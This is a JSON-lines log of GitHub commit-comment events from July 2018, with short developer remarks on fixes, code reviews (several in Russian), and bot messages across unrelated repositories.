{"id":"7935303659","type":"CommitCommentEvent","actor":{"login":"tek79"},"repo":{"name":"tek79/node-red-contrib-i2clcd"},"payload":{"comment":{"id":29636236,"position":null,"line":null,"path":null,"commit_id":"0cb175df2fa2c53feafca0d46499ea80901a747b","created_at":"2018-07-09T04:09:05Z","updated_at":"2018-07-09T04:09:05Z","author_association":"OWNER","body":"Fix to locate required node dependency 'i2c-lcd'. Remove startup text from init routine. Add screen clear function - is this any faster than calling init? Seems to move node 'i2c-lcd' on installation, must run 'node install' after installing this node to move the dependency back."}},"created_at":"2018-07-09T04:09:05Z"}
{"id":"7935304084","type":"CommitCommentEvent","actor":{"login":"dosyago-coder-0"},"repo":{"name":"dosyago-coder-0/brutal.js"},"payload":{"comment":{"id":29636237,"position":50,"line":87,"path":"r.js","commit_id":"b5c7bf0cd5fec9032c0d1705ea4905d8ffa33ec8","created_at":"2018-07-09T04:09:19Z","updated_at":"2018-07-09T04:09:19Z","author_association":"OWNER","body":"At this point `val` is possibly a quoted attribute value, so we can't escape the quotes in that, and we need to escape before we quote an attribute value. "}},"created_at":"2018-07-09T04:09:19Z"}
{"id":"7935304833","type":"CommitCommentEvent","actor":{"login":"endiliey"},"repo":{"name":"facebook/Docusaurus"},"payload":{"comment":{"id":29636240,"position":null,"line":null,"path":null,"commit_id":"85314dd1531cbe540ddac2c80476c8e86bff3dda","created_at":"2018-07-09T04:09:43Z","updated_at":"2018-07-09T04:09:43Z","author_association":"COLLABORATOR","body":"Hahaha. I think its more of because we dont use something like webpack. All the dependency path must be manually taken care by us"}},"created_at":"2018-07-09T04:09:43Z"}
{"id":"7935313651","type":"CommitCommentEvent","actor":{"login":"ramya-rao-a"},"repo":{"name":"Microsoft/vscode-docs"},"payload":{"comment":{"id":29636250,"position":5,"line":191,"path":"release-notes/v1_25.md","commit_id":"1400219c946620a9e2c36faa4788574fd8f5b6b5","created_at":"2018-07-09T04:13:35Z","updated_at":"2018-07-09T04:13:35Z","author_association":"MEMBER","body":"Good point. Created #1711"}},"created_at":"2018-07-09T04:13:35Z"}
{"id":"7935315237","type":"CommitCommentEvent","actor":{"login":"dosyago-coder-0"},"repo":{"name":"dosyago-coder-0/brutal.js"},"payload":{"comment":{"id":29636252,"position":63,"line":95,"path":"r.js","commit_id":"b5c7bf0cd5fec9032c0d1705ea4905d8ffa33ec8","created_at":"2018-07-09T04:14:05Z","updated_at":"2018-07-09T04:14:05Z","author_association":"OWNER","body":"I changed this to return `{str,handlers}` instead of just a string, so we can differentiate between things we need to escape (replaced values coming through R the first time as JS basic value types), and anything we don't need to escape (a `str` property in `{str,handlers}` object, as this has already come through R and had its replaced values escaped.)"}},"created_at":"2018-07-09T04:14:05Z"}
{"id":"7935316878","type":"CommitCommentEvent","actor":{"login":"dosyago-coder-0"},"repo":{"name":"dosyago-coder-0/brutal.js"},"payload":{"comment":{"id":29636254,"position":74,"line":104,"path":"r.js","commit_id":"b5c7bf0cd5fec9032c0d1705ea4905d8ffa33ec8","created_at":"2018-07-09T04:14:37Z","updated_at":"2018-07-09T04:14:37Z","author_association":"OWNER","body":"Removed some white space to keep the character count down"}},"created_at":"2018-07-09T04:14:37Z"}
{"id":"7935320543","type":"CommitCommentEvent","actor":{"login":"stevenmontes"},"repo":{"name":"stevenmontes/Proyecto-de-Patrones."},"payload":{"comment":{"id":29636262,"position":null,"line":null,"path":null,"commit_id":"c44427c45914eb7b7e21fe467915d3c3ae776351","created_at":"2018-07-09T04:16:00Z","updated_at":"2018-07-09T04:16:00Z","author_association":"OWNER","body":"**ES LISTAR PASO, NO LISTAR TAREA**"}},"created_at":"2018-07-09T04:16:00Z"}
{"id":"7935321208","type":"CommitCommentEvent","actor":{"login":"mpsido"},"repo":{"name":"skycoin/services"},"payload":{"comment":{"id":29636264,"position":null,"line":null,"path":null,"commit_id":"67d5151c8f514362129f2f43c00ef418939d3a03","created_at":"2018-07-09T04:16:20Z","updated_at":"2018-07-09T04:16:20Z","author_association":"COLLABORATOR","body":"Fixing issue #110 "}},"created_at":"2018-07-09T04:16:20Z"}
{"id":"7935322043","type":"CommitCommentEvent","actor":{"login":"dosyago-coder-0"},"repo":{"name":"dosyago-coder-0/brutal.js"},"payload":{"comment":{"id":29636266,"position":22,"line":36,"path":"r.js","commit_id":"b5c7bf0cd5fec9032c0d1705ea4905d8ffa33ec8","created_at":"2018-07-09T04:16:46Z","updated_at":"2018-07-09T04:16:46Z","author_association":"OWNER","body":"Since join now returns undefined instead of an object if `str` is empty, which is to ensure the `!!v.str` check for `{str,handlers}` passes (which would fail on an empty str property)."}},"created_at":"2018-07-09T04:16:46Z"}
{"id":"7935323871","type":"CommitCommentEvent","actor":{"login":"mpsido"},"repo":{"name":"skycoin/services"},"payload":{"comment":{"id":29636272,"position":null,"line":null,"path":null,"commit_id":"9a897b1760d86c844e45c383d8d40f9347297408","created_at":"2018-07-09T04:17:42Z","updated_at":"2018-07-09T04:17:42Z","author_association":"COLLABORATOR","body":"Fixing issue #110 "}},"created_at":"2018-07-09T04:17:42Z"}
{"id":"7935326703","type":"CommitCommentEvent","actor":{"login":"drgoncode"},"repo":{"name":"raul-utec/github-proyecto"},"payload":{"comment":{"id":29636278,"position":1,"line":1,"path":"contar vocales.py","commit_id":"b65c45ac3363912612f0a2452a35f93125895889","created_at":"2018-07-09T04:19:12Z","updated_at":"2018-07-09T04:19:12Z","author_association":"NONE","body":"#entrada de  datos desde consola."}},"created_at":"2018-07-09T04:19:12Z"}
{"id":"7935327914","type":"CommitCommentEvent","actor":{"login":"AhmadYm"},"repo":{"name":"AhmadYm/jshint"},"payload":{"comment":{"id":29636279,"position":null,"line":null,"path":null,"commit_id":"3b125e56546613db4afee3159ce6111c07c313e8","created_at":"2018-07-09T04:19:48Z","updated_at":"2018-07-09T04:19:48Z","author_association":"OWNER","body":"Identify"}},"created_at":"2018-07-09T04:19:48Z"}
{"id":"7935328304","type":"CommitCommentEvent","actor":{"login":"drgoncode"},"repo":{"name":"raul-utec/github-proyecto"},"payload":{"comment":{"id":29636281,"position":7,"line":7,"path":"contar vocales.py","commit_id":"b65c45ac3363912612f0a2452a35f93125895889","created_at":"2018-07-09T04:20:00Z","updated_at":"2018-07-09T04:20:00Z","author_association":"NONE","body":"#Declara la  funcion contar vocales"}},"created_at":"2018-07-09T04:20:00Z"}
{"id":"7935333410","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"AlmuraDev/Almura"},"payload":{"comment":{"id":29636289,"position":15,"line":35,"path":"build.gradle","commit_id":"6d3318a432d78a8223deeb4b5a3b65a122c789e5","created_at":"2018-07-09T04:22:30Z","updated_at":"2018-07-09T04:22:30Z","author_association":"CONTRIBUTOR","body":"👍 for this change"}},"created_at":"2018-07-09T04:22:30Z"}
{"id":"7935333655","type":"CommitCommentEvent","actor":{"login":"drgoncode"},"repo":{"name":"raul-utec/github-proyecto"},"payload":{"comment":{"id":29636290,"position":34,"line":34,"path":"contar vocales.py","commit_id":"b65c45ac3363912612f0a2452a35f93125895889","created_at":"2018-07-09T04:22:36Z","updated_at":"2018-07-09T04:22:36Z","author_association":"NONE","body":"`print(\"Se` ha terminado de contar vocales\" )"}},"created_at":"2018-07-09T04:22:36Z"}
{"id":"7935333763","type":"CommitCommentEvent","actor":{"login":"yangshun"},"repo":{"name":"facebook/Docusaurus"},"payload":{"comment":{"id":29636291,"position":null,"line":null,"path":null,"commit_id":"85314dd1531cbe540ddac2c80476c8e86bff3dda","created_at":"2018-07-09T04:22:40Z","updated_at":"2018-07-09T04:22:40Z","author_association":"MEMBER","body":"Yes that's one of the reason. Another thing to improve on is that we should have a utility that retrieves the siteConfig file regardless of CWD. Jest, ESLint, Babel (any tool that relies on a config) all have some sort of config retrieval code. With that we can stop relying on CWD."}},"created_at":"2018-07-09T04:22:40Z"}
{"id":"7935335407","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29636293,"position":10,"line":2,"path":"my_game.rb","commit_id":"db1db5143893240c7bc008c7341f4683374377fc","created_at":"2018-07-09T04:23:28Z","updated_at":"2018-07-09T04:23:28Z","author_association":"NONE","body":"вот этот аксессор нигде не используется\r\nон зачем ?"}},"created_at":"2018-07-09T04:23:28Z"}
{"id":"7935346025","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29636317,"position":9,"line":9,"path":"round.rb","commit_id":"75c6498721c33259512bdbe269a139bf94386b42","created_at":"2018-07-09T04:28:35Z","updated_at":"2018-07-09T04:28:35Z","author_association":"NONE","body":"8 и 9 строки лучше вынести из \"инишиалайза\"\r\n\"инишиалайз\" - это в первую очередь для инициализации аттрибутов (о чем можно догадаться по названию ))))\r\n8 и 9 строки - это уже в какой-то метод нужно отправлять"}},"created_at":"2018-07-09T04:28:35Z"}
{"id":"7935347842","type":"CommitCommentEvent","actor":{"login":"oldmud0"},"repo":{"name":"AttorneyOnline/acds"},"payload":{"comment":{"id":29636324,"position":50,"line":21,"path":"src/Server.js","commit_id":"205aecddb3e947b707b3c9ed01276e215e96ee61","created_at":"2018-07-09T04:29:29Z","updated_at":"2018-07-09T04:29:29Z","author_association":"MEMBER","body":"Will need to change to an array for ordering, and then provide some sort of indexing by unique id."}},"created_at":"2018-07-09T04:29:29Z"}
{"id":"7935348721","type":"CommitCommentEvent","actor":{"login":"oldmud0"},"repo":{"name":"AttorneyOnline/acds"},"payload":{"comment":{"id":29636325,"position":12,"line":45,"path":"test/schemas/info-basic.json","commit_id":"205aecddb3e947b707b3c9ed01276e215e96ee61","created_at":"2018-07-09T04:29:57Z","updated_at":"2018-07-09T04:29:57Z","author_association":"MEMBER","body":"I need to change this back to the array; I have a better idea. Bah."}},"created_at":"2018-07-09T04:29:57Z"}
{"id":"7935348860","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29636326,"position":95,"line":9858,"path":"mandelbulber2/src/fractal_formulas.cpp","commit_id":"f9508a73bd5222a1e0a1345a428f224b8616d249","created_at":"2018-07-09T04:30:01Z","updated_at":"2018-07-09T04:30:01Z","author_association":"OWNER","body":"For what this condition is needed. Why aux.DE cannot be calculated unconditionally?"}},"created_at":"2018-07-09T04:30:01Z"}
{"id":"7935354119","type":"CommitCommentEvent","actor":{"login":"JayKay1508"},"repo":{"name":"JayKay1508/GitVCS"},"payload":{"comment":{"id":29636339,"position":89,"line":89,"path":"GitTestProject/Projects/GitTestProject.xml","commit_id":"ac7ca66929acf95c74bfd72af463c33bf391143e","created_at":"2018-07-09T04:32:23Z","updated_at":"2018-07-09T04:32:23Z","author_association":"OWNER","body":"//Test\r\n"}},"created_at":"2018-07-09T04:32:23Z"}
{"id":"7935355403","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29636342,"position":21,"line":21,"path":"round.rb","commit_id":"75c6498721c33259512bdbe269a139bf94386b42","created_at":"2018-07-09T04:33:00Z","updated_at":"2018-07-09T04:33:00Z","author_association":"NONE","body":"а зачем этому методу принимать аргумент, если ты его используешь только для юзера\r\nдля дилера не используешь...\r\nя ж уже писал в прошлый раз: \"видишь что в аргументах внутреннего метода передается инстанс-переменная - скорее всего код кривой\"... \r\nпотому что инстанс-переменные тем и хороши, что их не надо передавать, они доступны внутри класса везде\r\n"}},"created_at":"2018-07-09T04:33:00Z"}
{"id":"7935355938","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29636344,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-09T04:33:18Z","updated_at":"2018-07-09T04:33:18Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-09T04:33:18Z"}
{"id":"7935361672","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29636352,"position":8,"line":8,"path":"station.rb","commit_id":"bbd9c87f24811b8112c5d127ab3fc18e097edc54","created_at":"2018-07-09T04:36:05Z","updated_at":"2018-07-09T04:36:05Z","author_association":"OWNER","body":"+"}},"created_at":"2018-07-09T04:36:05Z"}
{"id":"7935362700","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29636353,"position":21,"line":21,"path":"round.rb","commit_id":"75c6498721c33259512bdbe269a139bf94386b42","created_at":"2018-07-09T04:36:34Z","updated_at":"2018-07-09T04:36:34Z","author_association":"NONE","body":"у тебя кстати говоря все методы кроме `run` должны быть приватными\r\nпотому что ты их снаружи, как я понимаю,  не вызываешь...\r\nдобавь декларацию `private`\r\n"}},"created_at":"2018-07-09T04:36:34Z"}
{"id":"7935362841","type":"CommitCommentEvent","actor":{"login":"lwsKCMO"},"repo":{"name":"MicrosoftDocs/azure-docs"},"payload":{"comment":{"id":29636354,"position":null,"line":null,"path":null,"commit_id":"1d67277e730607b60967d1e8bf6de35bf6539af2","created_at":"2018-07-09T04:36:38Z","updated_at":"2018-07-09T04:36:38Z","author_association":"NONE","body":"Updated cloud-services-choose-me plural use\r\n\r\nCorrected helping verb error - singular use of \"is\" with plural noun.  Replaced with \"are\""}},"created_at":"2018-07-09T04:36:38Z"}
{"id":"7935364026","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/smp-feedstock"},"payload":{"comment":{"id":29636355,"position":null,"line":null,"path":null,"commit_id":"ad2156a6880b3e36280188e3fc894f6a986b2183","created_at":"2018-07-09T04:37:13Z","updated_at":"2018-07-09T04:37:13Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @anton-malakhov were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T04:37:13Z"}
{"id":"7935364044","type":"CommitCommentEvent","actor":{"login":"Dummyc0m"},"repo":{"name":"Dummyc0m/dotfiles"},"payload":{"comment":{"id":29636356,"position":null,"line":null,"path":null,"commit_id":"e2bbbd1251cf1b96e0915db0665e0c81971aa1e4","created_at":"2018-07-09T04:37:13Z","updated_at":"2018-07-09T04:37:13Z","author_association":"OWNER","body":", i i \r\n, i g\r\n, i f\r\nhave been defined as import-js keybindings"}},"created_at":"2018-07-09T04:37:13Z"}
{"id":"7935364738","type":"CommitCommentEvent","actor":{"login":"Dummyc0m"},"repo":{"name":"Dummyc0m/dotfiles"},"payload":{"comment":{"id":29636357,"position":null,"line":null,"path":null,"commit_id":"e2bbbd1251cf1b96e0915db0665e0c81971aa1e4","created_at":"2018-07-09T04:37:32Z","updated_at":"2018-07-09T04:37:32Z","author_association":"OWNER","body":"also fixes an indentation issue, see https://github.com/syl20bnr/spacemacs/issues/6520"}},"created_at":"2018-07-09T04:37:32Z"}
{"id":"7935365265","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29636358,"position":41,"line":41,"path":"round.rb","commit_id":"75c6498721c33259512bdbe269a139bf94386b42","created_at":"2018-07-09T04:37:49Z","updated_at":"2018-07-09T04:37:49Z","author_association":"NONE","body":"а вот теперь у тебя этот метод стал предикативом и возвращает булево\r\nзначит теперь его нужно писать со знаком вопроса на конце"}},"created_at":"2018-07-09T04:37:49Z"}
{"id":"7935372613","type":"CommitCommentEvent","actor":{"login":"benmurden"},"repo":{"name":"benmurden/django-intl-tel-input"},"payload":{"comment":{"id":29636367,"position":null,"line":null,"path":null,"commit_id":"7fd4dbe7ad9d134d0a8d9373c99b9a4d1dab9f4c","created_at":"2018-07-09T04:41:27Z","updated_at":"2018-07-09T04:41:27Z","author_association":"OWNER","body":"Fixes #10."}},"created_at":"2018-07-09T04:41:27Z"}
{"id":"7935373353","type":"CommitCommentEvent","actor":{"login":"sajjadjaved01"},"repo":{"name":"sajjadjaved01/iptv"},"payload":{"comment":{"id":29636369,"position":null,"line":null,"path":null,"commit_id":"6b8d66bcb8439c6920cff2e7488b049150621799","created_at":"2018-07-09T04:41:50Z","updated_at":"2018-07-09T04:41:50Z","author_association":"OWNER","body":"goto Manifest & change ur Startup Activity ."}},"created_at":"2018-07-09T04:41:50Z"}
{"id":"7935377958","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29636385,"position":57,"line":57,"path":"round.rb","commit_id":"75c6498721c33259512bdbe269a139bf94386b42","created_at":"2018-07-09T04:44:13Z","updated_at":"2018-07-09T04:44:13Z","author_association":"NONE","body":"1. метод `user_turn` вызывается в любом случае, что означает что его нужно вынести из условного блока\r\nа значит можно написать в 2 строки все\r\nв 53 строке вызвать то что в 54 с постфиксной проверкой из 53 строки\r\nи следующей строкой \"юзер терн\"... все... две строки\r\n2. уже писал: какое отношение \"ход пользователя\" имеет к методу \"ход дилера\" ???\r\nлибо вызов этого метода вобще нужно отсюда выносить, либо нужно назвать метод к примеру `players_turns` или `dealing`... еще как-то, но чтобы было понятно, что оба игрока будут здесь что-то делать"}},"created_at":"2018-07-09T04:44:13Z"}
{"id":"7935378869","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29636388,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-09T04:44:41Z","updated_at":"2018-07-09T04:44:41Z","author_association":"NONE","body":"另外，我是7月5日进行CPU和带宽赎回的，现在还没成功到账，按资源管理页面的“手动回款”也没有反应，期待你的回复。"}},"created_at":"2018-07-09T04:44:41Z"}
{"id":"7935379361","type":"CommitCommentEvent","actor":{"login":"urtofix"},"repo":{"name":"VladimirPolietaiev/java"},"payload":{"comment":{"id":29636391,"position":35,"line":32,"path":"ParkingApp/src/main/test/com/gojek/parkinglot/ParkingLotTest.java","commit_id":"7388aa858b5d335a834792c6c80c4dc08027f37b","created_at":"2018-07-09T04:44:57Z","updated_at":"2018-07-09T04:44:57Z","author_association":"NONE","body":"Нет необходимости в этом пробеле. Проверяй что ты комитишь. Если  я (ревьювер твоих комитов) вижу какие то изменения то я считаю считать что они сделаны не зря и трачу время думая чтобы это значило."}},"created_at":"2018-07-09T04:44:57Z"}
{"id":"7935382045","type":"CommitCommentEvent","actor":{"login":"urtofix"},"repo":{"name":"VladimirPolietaiev/java"},"payload":{"comment":{"id":29636402,"position":86,"line":68,"path":"ParkingApp/src/main/test/com/gojek/parkinglot/ParkingLotTest.java","commit_id":"7388aa858b5d335a834792c6c80c4dc08027f37b","created_at":"2018-07-09T04:46:15Z","updated_at":"2018-07-09T04:46:15Z","author_association":"NONE","body":"проверка на NULL была как пример. В реальности в этом мало смысла. Тест должен писаться под метод. Писать тест для меньшей единицы (чтото внутри метода) может иметь мало смысла"}},"created_at":"2018-07-09T04:46:15Z"}
{"id":"7935383334","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29636405,"position":67,"line":67,"path":"round.rb","commit_id":"75c6498721c33259512bdbe269a139bf94386b42","created_at":"2018-07-09T04:46:52Z","updated_at":"2018-07-09T04:46:52Z","author_association":"NONE","body":"66, 67 строки\r\nесли у тебя уже методы называются `user_cards` и `dealer_cards`, то зачем в них передавать аргументом игрока?\r\n\r\nинстанс-переменная будет и так доступна в каждом из этих методов\r\nи в каждом тебе нужна вполне определенная переменная, другая не может быть передана"}},"created_at":"2018-07-09T04:46:52Z"}
{"id":"7935383368","type":"CommitCommentEvent","actor":{"login":"urtofix"},"repo":{"name":"VladimirPolietaiev/java"},"payload":{"comment":{"id":29636406,"position":122,"line":104,"path":"ParkingApp/src/main/test/com/gojek/parkinglot/ParkingLotTest.java","commit_id":"7388aa858b5d335a834792c6c80c4dc08027f37b","created_at":"2018-07-09T04:46:53Z","updated_at":"2018-07-09T04:46:53Z","author_association":"NONE","body":"см коментарий про map и NULL"}},"created_at":"2018-07-09T04:46:53Z"}
{"id":"7935383515","type":"CommitCommentEvent","actor":{"login":"urtofix"},"repo":{"name":"VladimirPolietaiev/java"},"payload":{"comment":{"id":29636407,"position":136,"line":118,"path":"ParkingApp/src/main/test/com/gojek/parkinglot/ParkingLotTest.java","commit_id":"7388aa858b5d335a834792c6c80c4dc08027f37b","created_at":"2018-07-09T04:46:57Z","updated_at":"2018-07-09T04:46:57Z","author_association":"NONE","body":"см коментарий про map и NULL"}},"created_at":"2018-07-09T04:46:57Z"}
{"id":"7935387351","type":"CommitCommentEvent","actor":{"login":"urtofix"},"repo":{"name":"VladimirPolietaiev/java"},"payload":{"comment":{"id":29636412,"position":23,"line":140,"path":"ParkingApp/src/main/test/com/gojek/parkinglot/ParkingLotTest.java","commit_id":"3ff5959f5f5f5245fb747cb08f1b433b94858c34","created_at":"2018-07-09T04:48:47Z","updated_at":"2018-07-09T04:48:47Z","author_association":"NONE","body":"этот метод ничего не возращает а просто выводит в консоль. Зачем его вызывать? Его никакой асер не ипользует"}},"created_at":"2018-07-09T04:48:47Z"}
{"id":"7935388256","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29636413,"position":84,"line":84,"path":"round.rb","commit_id":"75c6498721c33259512bdbe269a139bf94386b42","created_at":"2018-07-09T04:49:11Z","updated_at":"2018-07-09T04:49:11Z","author_association":"NONE","body":"скобки не нужны, т.к. `&&` имеет более высокий приоритет, чем `||`"}},"created_at":"2018-07-09T04:49:11Z"}
{"id":"7935388587","type":"CommitCommentEvent","actor":{"login":"SUPERNOT"},"repo":{"name":"firelotto/firelotto"},"payload":{"comment":{"id":29636415,"position":null,"line":null,"path":null,"commit_id":"707b21cb93c2a2a3428c551ca5e392049b650040","created_at":"2018-07-09T04:49:21Z","updated_at":"2018-07-09T04:49:21Z","author_association":"NONE","body":"Not9"}},"created_at":"2018-07-09T04:49:21Z"}
{"id":"7935390820","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29636417,"position":128,"line":128,"path":"round.rb","commit_id":"75c6498721c33259512bdbe269a139bf94386b42","created_at":"2018-07-09T04:50:23Z","updated_at":"2018-07-09T04:50:23Z","author_association":"NONE","body":"а почему такой странный отступ ?"}},"created_at":"2018-07-09T04:50:23Z"}
{"id":"7935391032","type":"CommitCommentEvent","actor":{"login":"SUPERNOT"},"repo":{"name":"firelotto/firelotto"},"payload":{"comment":{"id":29636418,"position":1,"line":1,"path":"README.md","commit_id":"707b21cb93c2a2a3428c551ca5e392049b650040","created_at":"2018-07-09T04:50:29Z","updated_at":"2018-07-09T04:50:29Z","author_association":"NONE","body":"Not10"}},"created_at":"2018-07-09T04:50:29Z"}
{"id":"7935391111","type":"CommitCommentEvent","actor":{"login":"racquelsat"},"repo":{"name":"racquelsat/RacqStaq"},"payload":{"comment":{"id":29636419,"position":2,"line":2,"path":"RacqStaq","commit_id":"9b1e855354ae3883711ffb382385b9564256490d","created_at":"2018-07-09T04:50:32Z","updated_at":"2018-07-09T04:50:32Z","author_association":"OWNER","body":"No, they are not visible tonight.."}},"created_at":"2018-07-09T04:50:32Z"}
{"id":"7935391503","type":"CommitCommentEvent","actor":{"login":"SUPERNOT"},"repo":{"name":"firelotto/firelotto"},"payload":{"comment":{"id":29636420,"position":null,"line":null,"path":null,"commit_id":"707b21cb93c2a2a3428c551ca5e392049b650040","created_at":"2018-07-09T04:50:41Z","updated_at":"2018-07-09T04:50:41Z","author_association":"NONE","body":"Not8"}},"created_at":"2018-07-09T04:50:41Z"}
{"id":"7935391920","type":"CommitCommentEvent","actor":{"login":"urtofix"},"repo":{"name":"VladimirPolietaiev/java"},"payload":{"comment":{"id":29636421,"position":25,"line":142,"path":"ParkingApp/src/main/test/com/gojek/parkinglot/ParkingLotTest.java","commit_id":"3ff5959f5f5f5245fb747cb08f1b433b94858c34","created_at":"2018-07-09T04:50:52Z","updated_at":"2018-07-09T04:50:52Z","author_association":"NONE","body":"этот метод не относится к проверке метода getRegistrationNumbersFromColor(). Даже не вызывает этот метод parkingLot.map3.containsKey(\"blue\")) будет true"}},"created_at":"2018-07-09T04:50:52Z"}
{"id":"7935393308","type":"CommitCommentEvent","actor":{"login":"urtofix"},"repo":{"name":"VladimirPolietaiev/java"},"payload":{"comment":{"id":29636422,"position":40,"line":157,"path":"ParkingApp/src/main/test/com/gojek/parkinglot/ParkingLotTest.java","commit_id":"3ff5959f5f5f5245fb747cb08f1b433b94858c34","created_at":"2018-07-09T04:51:30Z","updated_at":"2018-07-09T04:51:30Z","author_association":"NONE","body":"в этом тесте нету никакого тестирования getRegistrationNumbersFromColor()"}},"created_at":"2018-07-09T04:51:30Z"}
{"id":"7935393702","type":"CommitCommentEvent","actor":{"login":"urtofix"},"repo":{"name":"VladimirPolietaiev/java"},"payload":{"comment":{"id":29636423,"position":56,"line":173,"path":"ParkingApp/src/main/test/com/gojek/parkinglot/ParkingLotTest.java","commit_id":"3ff5959f5f5f5245fb747cb08f1b433b94858c34","created_at":"2018-07-09T04:51:40Z","updated_at":"2018-07-09T04:51:40Z","author_association":"NONE","body":"в этом тесте нету никакого тестирования getRegistrationNumbersFromColor()"}},"created_at":"2018-07-09T04:51:40Z"}
{"id":"7935394259","type":"CommitCommentEvent","actor":{"login":"urtofix"},"repo":{"name":"VladimirPolietaiev/java"},"payload":{"comment":{"id":29636424,"position":71,"line":188,"path":"ParkingApp/src/main/test/com/gojek/parkinglot/ParkingLotTest.java","commit_id":"3ff5959f5f5f5245fb747cb08f1b433b94858c34","created_at":"2018-07-09T04:51:57Z","updated_at":"2018-07-09T04:51:57Z","author_association":"NONE","body":"в этом тесте нету никакого тестирования getRegistrationNumbersFromColor()"}},"created_at":"2018-07-09T04:51:57Z"}
{"id":"7935394840","type":"CommitCommentEvent","actor":{"login":"urtofix"},"repo":{"name":"VladimirPolietaiev/java"},"payload":{"comment":{"id":29636425,"position":87,"line":204,"path":"ParkingApp/src/main/test/com/gojek/parkinglot/ParkingLotTest.java","commit_id":"3ff5959f5f5f5245fb747cb08f1b433b94858c34","created_at":"2018-07-09T04:52:13Z","updated_at":"2018-07-09T04:52:13Z","author_association":"NONE","body":"в этом тесте нету никакого тестирования getRegistrationNumbersFromColor()"}},"created_at":"2018-07-09T04:52:13Z"}
{"id":"7935395006","type":"CommitCommentEvent","actor":{"login":"urtofix"},"repo":{"name":"VladimirPolietaiev/java"},"payload":{"comment":{"id":29636426,"position":102,"line":219,"path":"ParkingApp/src/main/test/com/gojek/parkinglot/ParkingLotTest.java","commit_id":"3ff5959f5f5f5245fb747cb08f1b433b94858c34","created_at":"2018-07-09T04:52:17Z","updated_at":"2018-07-09T04:52:17Z","author_association":"NONE","body":"в этом тесте нету никакого тестирования getRegistrationNumbersFromColor()"}},"created_at":"2018-07-09T04:52:17Z"}
{"id":"7935395142","type":"CommitCommentEvent","actor":{"login":"urtofix"},"repo":{"name":"VladimirPolietaiev/java"},"payload":{"comment":{"id":29636427,"position":118,"line":235,"path":"ParkingApp/src/main/test/com/gojek/parkinglot/ParkingLotTest.java","commit_id":"3ff5959f5f5f5245fb747cb08f1b433b94858c34","created_at":"2018-07-09T04:52:21Z","updated_at":"2018-07-09T04:52:21Z","author_association":"NONE","body":"в этом тесте нету никакого тестирования getRegistrationNumbersFromColor()"}},"created_at":"2018-07-09T04:52:21Z"}
{"id":"7935397495","type":"CommitCommentEvent","actor":{"login":"rajitbh"},"repo":{"name":"rajitbh/rajit.github.io"},"payload":{"comment":{"id":29636430,"position":null,"line":null,"path":null,"commit_id":"0dde00e0755ea2f0322603c407b7c644956446a6","created_at":"2018-07-09T04:53:26Z","updated_at":"2018-07-09T04:53:26Z","author_association":"OWNER","body":"fix"}},"created_at":"2018-07-09T04:53:26Z"}
{"id":"7935397523","type":"CommitCommentEvent","actor":{"login":"urtofix"},"repo":{"name":"VladimirPolietaiev/java"},"payload":{"comment":{"id":29636431,"position":null,"line":null,"path":null,"commit_id":"3ff5959f5f5f5245fb747cb08f1b433b94858c34","created_at":"2018-07-09T04:53:27Z","updated_at":"2018-07-09T04:53:27Z","author_association":"NONE","body":"getRegistrationNumbersFromColor() - у этого метода есть своя цель. Он чтото делает. Так вотто что он делает ты не тестировал"}},"created_at":"2018-07-09T04:53:27Z"}
{"id":"7935399138","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"dev-harsh1998/android_device_lenovo_a6000"},"payload":{"comment":{"id":29636434,"position":null,"line":null,"path":null,"commit_id":"9c9bbb00bd6816138c7f266b674540e44b0bc0ee","created_at":"2018-07-09T04:54:12Z","updated_at":"2018-07-09T04:54:12Z","author_association":"NONE","body":"Remove that have synaptic fw update flag"}},"created_at":"2018-07-09T04:54:12Z"}
